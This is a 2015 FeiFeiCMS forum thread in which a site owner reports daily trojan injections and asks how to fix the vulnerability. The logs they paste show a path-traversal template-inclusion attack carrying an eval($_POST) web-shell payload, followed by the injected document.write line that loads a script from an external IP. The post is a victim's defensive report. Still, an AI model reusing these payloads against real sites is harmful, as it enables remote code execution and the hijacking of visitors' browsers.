飞飞CMS官方论坛

飞飞CMS官方论坛»论坛交流 FeiFeiCms交流 FeiFeiCms-使用与交流 老大,就是这个漏洞啊,怎么修复啊,天天挂马

FeiFeiCms官方发布_【电视TV版系统】 通过这个窗口,关注跟踪我们的研发进展 飞飞CMS开发手册 - 飞飞官方论坛说明

FeiFeiCms官方发布_【商业版_V15系统】 功能强大,终身免费升级,建站不二选择 模板展示中心 - 飞飞免费版与收费版介绍

飞飞cms影视系统_免费版_8.1正式版【官方下载】 程序100%开源,视频管理系统PHP版,5分钟快速建站 销售QQ:1306428988 - TG:https://t.me/feifeicms520

6 6764

老大,就是这个漏洞啊,怎么修复啊,天天挂马

ooola 于2015-3-24 21:32:09发表 显示全部楼层 [打印] [上一主题] [下一主题]
收藏 跳转到指定楼层
漏洞危害等级非常高,只要被盯上了,有的烦哦。

wooyun.org/bugs/wooyun-2010-082291

下面是后台监控到的日志。

[ 2015-03-24T20:08:54+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:09+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\{~eval($_POST[x])}]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
[ 2015-03-24T20:09:26+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]


挂马的就是这个 狗日的。:

document.write('<script type="text/javascript" src="htt##p:/###/121.40.113.68/header.js"></script>');
发不了连接 #号隔开

当前处理办法:tpl 目录完全不可写。木马就写到 runtime 目录了

 

                                                   飞飞cms官方论坛-www.feifeicms.vip

回复

使用道具 举报

返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

飞飞Cms视频点播系统

 声明:请在遵守法律前提下使用本站开发的相关程序,对用户使用过程中的信息内容本站及开发者不负任何责任!

Powered by  © 2006-2024 飞飞网络科技有限公司,官方销售QQ:1306428988 或加Telegram: feifeicms520

手机版  |  飞飞CMS官方论坛 ( 鄂ICP备14015395号-2

立刻咨询
快速回复 返回顶部 返回列表